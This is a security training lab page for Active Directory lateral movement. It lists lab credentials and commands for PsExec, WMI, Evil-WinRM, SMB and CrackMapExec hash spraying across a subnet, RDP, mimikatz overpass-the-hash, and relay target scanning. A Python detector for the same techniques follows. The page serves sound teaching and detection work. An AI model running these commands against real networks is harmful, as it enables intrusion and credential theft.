🏛️ Pracivo Advanced AD Lab

PRACIVO LAB — INTENTIONALLY VULNERABLE
⚠️ Pracivo Security Lab — Advanced AD attack techniques beyond Kerberoasting. Includes AS-REP Roasting, DCSync, Golden Tickets, and BloodHound.
Lab Credentials: ram / pracivo  |  john.smith / Welcome1  |  administrator / Admin@2024

Lateral Movement Techniques

POST-EXPLOITATION
# Once you have credentials or a hash, move to other machines

# 1. PsExec — creates a service on remote host
psexec.py corp.local/administrator:Admin@2024@192.168.1.20
# Or with hash:
psexec.py -hashes :NTLM_HASH corp.local/administrator@192.168.1.20

# 2. WMI — stealthier, no service creation
wmiexec.py corp.local/administrator:Admin@2024@192.168.1.20

# 3. WinRM / Evil-WinRM
evil-winrm -i 192.168.1.20 -u administrator -p Admin@2024
# Or pass the hash:
evil-winrm -i 192.168.1.20 -u administrator -H NTLM_HASH

# 4. SMB — access shares and read files
smbclient //192.168.1.20/c$ -U administrator
crackmapexec smb 192.168.1.0/24 -u administrator -p Admin@2024

# 5. RDP — graphical session
xfreerdp /v:192.168.1.20 /u:administrator /p:Admin@2024

# 6. Pass the Hash with CrackMapExec — spray hash across subnet
crackmapexec smb 192.168.1.0/24 -u administrator -H NTLM_HASH --local-auth

# 7. Overpass the Hash — use the NTLM hash as the key to request a Kerberos TGT
# (typed at the mimikatz console on a Windows host)
mimikatz: sekurlsa::pth /user:administrator /domain:corp.local /ntlm:NTLM_HASH /run:cmd.exe

# Scanning for relay targets: writes the hosts that do not require SMB signing to a file
crackmapexec smb 192.168.1.0/24 --gen-relay-list relay_targets.txt
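
Detection side of the techniques above, as an added example that is not part of the lab page: the code flags a service install (System event 7045) shortly after an NTLM network logon, which is what PsExec leaves behind; one source making NTLM network logons (Security event 4624, type 3) to several hosts, as a subnet-wide hash spray does; and a LogonType 9 logon through seclogo, which is what sekurlsa::pth produces. The event field names follow Windows event data; the `ts` seconds, host names, source address, thresholds and rule names are assumptions made for the example.

```python
from collections import defaultdict

def ev(ts, eid, host, **data):
    """Build one constructed event; keys mirror Windows event data field names."""
    return {"ts": ts, "EventID": eid, "Computer": host, **data}

# Constructed sample events, not taken from a real host.
NTLM3 = {"LogonType": 3, "AuthenticationPackageName": "NTLM", "LogonProcessName": "NtLmSsp"}
SRC = "192.168.1.50"  # assumed source address
SAMPLE = [
    ev(100, 4624, "WS01", IpAddress=SRC, TargetUserName="administrator", **NTLM3),
    ev(103, 7045, "WS01", ServiceName="kXqZ", ImagePath="%systemroot%\\aBcDeFgH.exe"),
    ev(110, 4624, "WS02", IpAddress=SRC, TargetUserName="administrator", **NTLM3),
    ev(112, 4624, "WS03", IpAddress=SRC, TargetUserName="administrator", **NTLM3),
    ev(500, 4624, "WS04", IpAddress="-", TargetUserName="ram", LogonType=9,
       AuthenticationPackageName="Negotiate", LogonProcessName="seclogo"),
    ev(900, 4624, "FS01", IpAddress="192.168.1.77", TargetUserName="john.smith",
       LogonType=3, AuthenticationPackageName="Kerberos", LogonProcessName="Kerberos"),
    ev(5000, 7045, "FS01", ServiceName="BackupAgent",
       ImagePath="C:\\Program Files\\Backup\\agent.exe"),
]

def is_net_ntlm(e):
    """True for a successful network logon (type 3) authenticated with NTLM."""
    return (e["EventID"] == 4624 and e.get("LogonType") == 3
            and e.get("AuthenticationPackageName") == "NTLM")

def detect(events, window=60, fanout=3):
    """Return sorted (rule, subject) findings for the three patterns."""
    findings, last_logon, targets = set(), {}, defaultdict(set)
    for e in sorted(events, key=lambda x: x["ts"]):
        host = e["Computer"]
        if is_net_ntlm(e):
            last_logon[host] = e["ts"]
            targets[e["IpAddress"]].add(host)
        elif (e["EventID"] == 4624 and e.get("LogonType") == 9
              and e.get("LogonProcessName", "").strip().lower() == "seclogo"):
            # NewCredentials logon via seclogo: the footprint of sekurlsa::pth
            findings.add(("newcredentials-seclogo", host))
        elif e["EventID"] == 7045 and e["ts"] - last_logon.get(host, -10**9) <= window:
            # Service installed right after an NTLM network logon: PsExec-style execution
            findings.add(("service-after-network-logon", host))
    for src, hosts in targets.items():
        if len(hosts) >= fanout:  # one source authenticating to many hosts over NTLM
            findings.add(("ntlm-fanout", src))
    return sorted(findings)
```

Both thresholds need tuning against a baseline, since software deployment tools and vulnerability scanners produce the same service-install and fan-out patterns legitimately.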